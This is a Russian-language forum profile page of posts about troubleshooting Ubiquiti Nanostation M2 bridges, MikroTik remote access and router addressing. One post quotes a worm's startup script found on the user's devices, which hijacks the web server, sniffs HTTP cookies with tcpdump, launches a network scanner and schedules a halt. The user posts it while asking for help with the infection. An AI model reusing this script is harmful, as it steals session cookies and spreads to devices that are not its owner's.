Перейти к содержимому
Калькуляторы

avgaz

Пользователи
  • Публикации

    51
  • Зарегистрирован

  • Посещение

О avgaz

  • Звание
    Абитуриент
    Абитуриент
  1. Зависает Nanostation M2

    Спасибо большое действительно на обоих точках был этот файл с таким содержанием #!/bin/sh sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3` ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"` #sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip & if [ -e /bin/tcpdump ]; then tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/ /etc/persistent/.skynet/sendcook & fi (sleep 20 ; /etc/persistent/.skynet/scan) & (sleep 100400 ; sleep 42 ; halt) & Удалил посмотри на результат. Но хотелось бы понять как он туда попал, вернее где искать источник заразы? что бы повторно он там не появился?
  2. Зависает Nanostation M2

    Если я правильно понял то содержимое такое XM.v5.3.3# cd /etc/persistent XM.v5.3.3# ls dropbear_dss_host_key mcuser dropbear_rsa_host_key rc.poststart Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна?
  3. Зависает Nanostation M2

    Это на антенне? как посотреть?
  4. Зависает Nanostation M2

    Если можно подробней про что это, а то становится не удобно звонить в час ночи на точку что бы перезагрузили. Пробовали менял БП не помогло Блала обчная не дорогая витая пара, которая простояла около года, то же с начало на это подумал поменяли результата нольNS установлена на болконе и подклюючена к роутеру который за окном кабеля не много осадки на него не попадают.
  5. Зависает Nanostation M2

    Сброс делал, прошику не перешивал да и не думаю что она тут в чем то виновата. поменял местами точки думал если проблема в антенне то которая не виснет удобнее перезагружать у себя, по после того какпоменял местами опять стала виснуть уже другая на прежней точке, поменяли пачкорд не помогло, уже даже не знаю в чем дело, может роутер который стоит за точкой виноват?
  6. Сообствено примерно через год использования моста на Nanostation M2 одна из точек начала глючить, примерно раз может и два раза в сутки зависает, то есть пропадает связь между точками и на зависшею точку не зайти, помогает только откл и вкл питания, после опять работает нормально связь между нормальная -67 dBm. Может кто сталкивался с этим?
  7. Удаленный доступ к mikrotik

    Вопрос. А какой IP у микротика для проброса?
  8. С no-ip всё предельно ясно, не понятно как сделать что бы туда отсылка IP происходила для ubnt Да кстати AirControl почему то отказывается работать с внешними IP вводишь в настройках, идет обмен по этому адресу сточкой далее почему то меняет обратно на локальный в логах вот такая фигня.
  9. Теперь ещё вопросик, а можно как то для ubnt с динамическим IP такое сделать? для микротика есть описание с использованием сервиса no-ip и скрипта, а для ubnt есть варианты?
  10. Вот такие вот настройки ubnt и роутера где что не так? в барузере в вожу 199.99.99.99:80 результат ноль другие прописанные порты то же. Ну учится не когда не поздно
  11. Как и всегда? Или есть какие-то отличия? Ну вот к примеру доступ на роутер 199.99.99.99:8080 а как входит на веб ubnt? какой порт пробрасывать?
  12. Собственно появился вопрос как получить удаленный доступ по статическому IP на веб интерфейс Ubiquiti?
  13. По приезду на базу, обнаружено что у роутеров разные IP у первого 192.168.1.1 у второго 192.168.0.1 но вот у всех клиентов Gateway IP был 192.168.0.1 передернул пачкорд идущий от роутера1 к миротику и стало раздавать инет как нужно, прописал клинту который берет инет с роутера1 Gateway IP 192.168.1.1 и все как бы стало работать нормально. Но вот думается надолго (( По предложенным вариантам как сделать с ходу не разобрался, времени было не много на это.
  14. Что то сложновато всё это для двух клиентов далать (( Вот думаю если на одном роутере поменять IP может картина измениться? смущает то что на самом роутере1 был интернет роутера2 и подключившись по wifi к роутеру1 при наборе ip 192.168.0.1 попадаешь на роутер2 Тоесть тоджно работать так роутер1->Bridge1=ether1+wlan1 и роутер2->Bridge2=wlan3+wlan4 а работает так сейчас роутер2->Bridge1=ether1+wlan1+Bridge2=wlan3+wlan4+роутер1